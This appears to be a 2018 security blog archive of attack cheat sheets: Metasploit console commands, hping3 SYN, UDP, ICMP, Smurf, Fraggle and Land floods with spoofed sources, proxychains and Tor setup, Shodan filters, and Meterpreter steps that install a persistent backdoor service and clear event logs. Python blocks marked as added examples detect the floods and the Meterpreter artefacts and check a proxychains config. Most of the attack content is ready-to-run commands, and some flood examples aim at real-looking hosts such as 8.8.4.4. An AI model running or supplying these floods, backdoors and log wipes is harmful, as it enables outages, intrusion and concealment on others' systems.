Search for module:
msf > search [regex]
Show all Exploits:
msf > show exploits
Specify an exploit to use:
msf > use [ExploitPath]
Show all Payloads:
msf > show payloads
Specify a Payload to use:
msf > set payload [PayloadPath]
Show all Targets:
msf > show targets
Specify a Target to use:
msf > set target [TargetNumber]
Show all Encoders:
msf > show encoders
Specify an encoder to use:
msf > set encoder [EncoderPath]
Show options for the current module:
msf > show options
Set options:
msf > set [Option] [Value]
Start the exploit (either command works):
msf > exploit
msf > run
Tuesday, May 29, 2018
Saturday, May 26, 2018
Utilizing Hping3 to launch Denial of Service (DoS) attacks
This post is written down for convenience only. It does not cover some classic Denial of Service (DoS) attacks such as Ping of Death and Teardrop.
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V: Verbose Mode
-c: Packet Count
-d: Data Size (payload bytes)
-S: Set the SYN flag
-w: TCP Window Size
-p: Destination Port
-s: Source Base Port
--flood: Flood Mode (send packets as fast as possible)
--rand-source: Random spoofed source IP addresses
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood: Flood Mode (send packets as fast as possible)
--rand-source: Random spoofed source IP addresses
--udp: UDP Mode
-p: Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
Explanation:
-1: ICMP Mode
--flood: Flood Mode (send packets as fast as possible)
--rand-source: Random spoofed source IP addresses
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1: ICMP Mode
--flood: Flood Mode (send packets as fast as possible)
-a: Spoofed Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp: UDP Mode
--flood: Flood Mode (send packets as fast as possible)
-p: Destination Port
-s: Source Base Port
-k: Keep the source port the same
-a: Spoofed Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V: Verbose Mode
-c: Packet Count
-d: Data Size (payload bytes)
-S: Set the SYN flag
-w: TCP Window Size
-p: Destination Port
-s: Source Base Port
-k: Keep the source port the same
-a: Spoofed Source IP or Host
--flood: Flood Mode (send packets as fast as possible)
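From the defender's side, each of the floods above leaves a distinctive trace: a LAND packet has identical source and destination address and port, Smurf and Fraggle traffic is ICMP echo or UDP echo/chargen aimed at a broadcast address, and a SYN flood is a burst of SYN-only segments from many sources at one port. The following detection routine is an added example and is not part of the original post; the packet summaries are constructed inline, and the one-second window and 100-SYN threshold are assumptions that must be tuned for a real network.

```python
"""Flag the flood patterns listed above in a batch of packet summaries.

Added example, not from the original post. Packets are constructed inline;
in practice they would come from a pcap or flow export. The window size
and SYN threshold are assumptions to tune per network.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    ts: float                        # timestamp in seconds
    proto: str                       # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: Optional[int] = None
    dport: Optional[int] = None
    flags: str = ""                  # TCP flags, "S" means SYN only
    icmp_type: Optional[int] = None  # 8 = echo request


def is_land(p: Packet) -> bool:
    """LAND: source and destination address *and* port are identical."""
    return p.src == p.dst and p.sport is not None and p.sport == p.dport


def amplifier_kind(p: Packet, broadcast_addrs: set) -> Optional[str]:
    """Smurf = ICMP echo request to broadcast; Fraggle = UDP echo/chargen to broadcast."""
    if p.dst not in broadcast_addrs:
        return None
    if p.proto == "icmp" and p.icmp_type == 8:
        return "smurf"
    if p.proto == "udp" and p.dport in (7, 19):
        return "fraggle"
    return None


def syn_flood_windows(packets, window=1.0, threshold=100):
    """Per (dst, dport, time window): count SYN-only segments and distinct sources."""
    buckets = defaultdict(lambda: [0, set()])
    for p in packets:
        if p.proto == "tcp" and p.flags == "S":
            key = (p.dst, p.dport, int(p.ts // window))
            buckets[key][0] += 1
            buckets[key][1].add(p.src)
    return [
        {"target": (dst, dport), "window": w, "syn_count": n, "distinct_sources": len(s)}
        for (dst, dport, w), (n, s) in buckets.items()
        if n >= threshold
    ]


def analyze(packets, broadcast_addrs, window=1.0, syn_threshold=100):
    """Run every check and group the hits by attack pattern."""
    findings = {"land": [], "smurf": [], "fraggle": [], "syn_flood": []}
    for p in packets:
        if is_land(p):
            findings["land"].append(p)
        kind = amplifier_kind(p, broadcast_addrs)
        if kind:
            findings[kind].append(p)
    findings["syn_flood"] = syn_flood_windows(packets, window, syn_threshold)
    return findings


def sample_traffic():
    """Constructed traffic: 300 spoofed SYNs within one second plus one of each other pattern."""
    pkts = []
    for i in range(300):
        src = f"10.{i // 256}.{i % 256}.{(i * 37) % 250 + 1}"  # deterministic, all distinct
        pkts.append(Packet(ts=i / 300, proto="tcp", src=src, dst="192.168.0.88",
                           sport=1025 + i, dport=80, flags="S"))
    pkts.append(Packet(ts=2.0, proto="tcp", src="192.168.0.5", dst="192.168.0.88",
                       sport=40000, dport=80, flags="S"))   # a single benign SYN
    pkts.append(Packet(ts=2.1, proto="tcp", src="192.168.0.88", dst="192.168.0.88",
                       sport=80, dport=80, flags="S"))      # LAND
    pkts.append(Packet(ts=2.2, proto="icmp", src="192.168.0.3", dst="192.168.0.255",
                       icmp_type=8))                        # Smurf
    pkts.append(Packet(ts=2.3, proto="udp", src="192.168.0.3", dst="192.168.0.255",
                       sport=7, dport=7))                   # Fraggle
    return pkts


if __name__ == "__main__":
    result = analyze(sample_traffic(), broadcast_addrs={"192.168.0.255"})
    for kind, hits in result.items():
        print(f"{kind}: {len(hits)} hit(s)")
```

The SYN check keys on (destination, port, window) rather than on the source because `--rand-source` makes per-source counting useless; the distinct-source count is what separates a spoofed flood from one noisy client.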
References:
http://0daysecurity.com/articles/hping3_examples.html
http://www.hackingarticles.in/dos-penetration-testing-part-1/
http://www.iv2-technologies.com/DOSAttacks.pdf
https://neelpathak.wordpress.com/tag/hping3-tutorials/
http://blognyajohny.blogspot.com/2014/04/ddos-attack-using-hping-command-in-kali.html
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
Tuesday, May 22, 2018
Apply a SOCKS proxy (e.g. Tor) to the Linux shell by using Proxychains
1) Start a SOCKS proxy, such as the Tor service
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Run the command below to verify that the public IP address has changed
proxychains wget -qO- v4.ifconfig.co
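A misplaced or mistyped proxy line makes proxychains fall back to a direct connection or fail outright, and without `proxy_dns` the name lookup still goes to the local resolver even though the TCP connection is proxied. The checker below is an added example, not part of the original post: it parses a proxychains.conf body and reports those problems. It assumes the proxychains [ProxyList] entry format `type host port [user pass]` and the `proxy_dns` setting; the two config texts are constructed, and the Tor Browser port 9150 is the one from the post (a system tor daemon listens on 9050 by default).

```python
"""Sanity-check a proxychains.conf before relying on it.

Added example, not from the original post. The config texts below are
constructed stand-ins for /etc/proxychains.conf.
"""
import re

# proxychains [ProxyList] entry: "type host port" with optional "user pass"
PROXY_LINE = re.compile(r"^(socks4|socks5|http)\s+(\S+)\s+(\d{1,5})(?:\s+(\S+)\s+(\S+))?$")


def parse_proxychains_conf(text: str):
    """Return (settings, proxies, problems) for a proxychains.conf body."""
    settings = set()
    proxies = []
    problems = []
    in_proxy_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and surrounding whitespace
        if not line:
            continue
        if line == "[ProxyList]":
            in_proxy_list = True
            continue
        if not in_proxy_list:
            settings.add(line.split()[0])      # e.g. strict_chain, proxy_dns, tcp_read_time_out
            continue
        m = PROXY_LINE.match(line)
        if not m:
            problems.append(f"line {lineno}: unparsable proxy entry {line!r}")
            continue
        kind, host, port = m.group(1), m.group(2), int(m.group(3))
        if not 0 < port < 65536:
            problems.append(f"line {lineno}: port {port} out of range")
            continue
        proxies.append((kind, host, port))
    if not proxies:
        problems.append("no proxy defined under [ProxyList]")
    if "proxy_dns" not in settings:
        problems.append("proxy_dns not set: DNS lookups will bypass the proxy")
    return settings, proxies, problems


# Constructed config mirroring the edit in the post: Tor Browser's SOCKS5 port appended to the list.
GOOD_CONF = """\
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks5 127.0.0.1 9150
"""

# Constructed config with the proxy type mistyped and proxy_dns missing.
BAD_CONF = """\
strict_chain
[ProxyList]
sock5 127.0.0.1 9150
"""

if __name__ == "__main__":
    for name, conf in (("good", GOOD_CONF), ("bad", BAD_CONF)):
        settings, proxies, problems = parse_proxychains_conf(conf)
        print(name, proxies, problems or "OK")
```

Run it against the real file with `parse_proxychains_conf(open("/etc/proxychains.conf").read())` before trusting the `wget` check in step 4; an empty problem list means the proxy line was parsed the way proxychains will parse it.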
Leverage Tor as a SOCKS proxy
After the Tor Browser is started, point the operating system's SOCKS proxy setting to "127.0.0.1:9150".
P.S.: When the Tor Browser is closed, its SOCKS proxy service is shut down at the same time.
Install and configure Tor
1) Download Tor Browser from https://www.torproject.org/download/download-easy.html.en
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment out the lines below, then save and exit vi
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root. Exiting."
exit 1
fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
Monday, May 21, 2018
Some examples of Shodan search keywords
[Geography]
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
Some common use cases of Meterpreter
Install a persistent backdoor:
meterpreter > ps
Locate explorer.exe in the process list (suppose its process ID is 623), then migrate into it and install the service:
meterpreter > migrate 623
meterpreter > run metsvc
Connect to the metsvc listener (suppose the victim's IP address is 192.168.1.104):
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > set RHOST 192.168.1.104
msf exploit(handler) > show options
msf exploit(handler) > run
Clear all event logs:
meterpreter > clearev
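Both steps of this sequence are visible to whoever watches the host's event logs: `run metsvc` registers a new Windows service, and `clearev` itself is logged as a log-clear event. The routine below is an added example, not part of the original post, showing how a defender would pick those two artefacts out of event data. It assumes the metsvc persistence registers a service named `metsvc` and uses the standard Windows event IDs 7045 (System: new service installed), 4697 (Security: service installed), 1102 (Security: audit log cleared) and 104 (System: event log cleared); the event records and file paths are constructed.

```python
"""Spot the Meterpreter persistence and log-wipe artefacts in Windows event data.

Added example, not from the original post. Event records are constructed
inline as dicts shaped like the fields a SIEM would export. The service
name 'metsvc' is an assumption about the metsvc persistence module.
"""

SERVICE_INSTALL_IDS = {7045, 4697}      # System 7045 / Security 4697: new service installed
LOG_CLEARED_IDS = {1102, 104}           # Security 1102 / System 104: a log was cleared
SUSPECT_SERVICE_NAMES = {"metsvc"}      # assumed default name of the metsvc service
SUSPECT_PATH_FRAGMENTS = ("\\temp\\", "\\appdata\\", "\\users\\public\\")


def classify_event(ev: dict):
    """Return a finding string for a suspicious event, or None for a benign one."""
    eid = ev.get("event_id")
    if eid in LOG_CLEARED_IDS:
        return f"event log cleared on {ev.get('host')} (id {eid}, by {ev.get('user')})"
    if eid in SERVICE_INSTALL_IDS:
        name = (ev.get("service_name") or "").lower()
        path = (ev.get("image_path") or "").lower()
        if name in SUSPECT_SERVICE_NAMES:
            return f"known Meterpreter service name {name!r} installed on {ev.get('host')}"
        if any(frag in path for frag in SUSPECT_PATH_FRAGMENTS):
            return f"service {name!r} installed from user-writable path {path!r} on {ev.get('host')}"
    return None


def scan_events(events):
    """Return findings in order; a log clear after a suspicious install on the same host is escalated."""
    findings = []
    hosts_with_install = set()
    for ev in events:
        finding = classify_event(ev)
        if finding is None:
            continue
        if ev.get("event_id") in SERVICE_INSTALL_IDS:
            hosts_with_install.add(ev.get("host"))
        elif ev.get("host") in hosts_with_install:
            finding = "HIGH: " + finding + " shortly after a suspicious service install"
        findings.append(finding)
    return findings


# Constructed sample: a benign vendor service, the metsvc install, a logon, then the log wipe.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 7045, "service_name": "BenignVpnDrv",
     "image_path": "C:\\Program Files\\Vendor\\vpn.sys", "user": "SYSTEM"},
    {"host": "WS01", "event_id": 7045, "service_name": "metsvc",
     "image_path": "C:\\Windows\\Temp\\xyz\\metsvc.exe", "user": "SYSTEM"},
    {"host": "WS01", "event_id": 4624, "user": "alice"},
    {"host": "WS01", "event_id": 1102, "user": "alice"},
    {"host": "WS02", "event_id": 104, "user": "bob"},
]

if __name__ == "__main__":
    for line in scan_events(SAMPLE_EVENTS):
        print(line)
```

Because `clearev` wipes the local copy, the 1102/104 events are only useful if logs are forwarded off the host before they can be cleared; the escalation logic assumes such a forwarded stream.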
Sunday, May 13, 2018
Saturday, May 12, 2018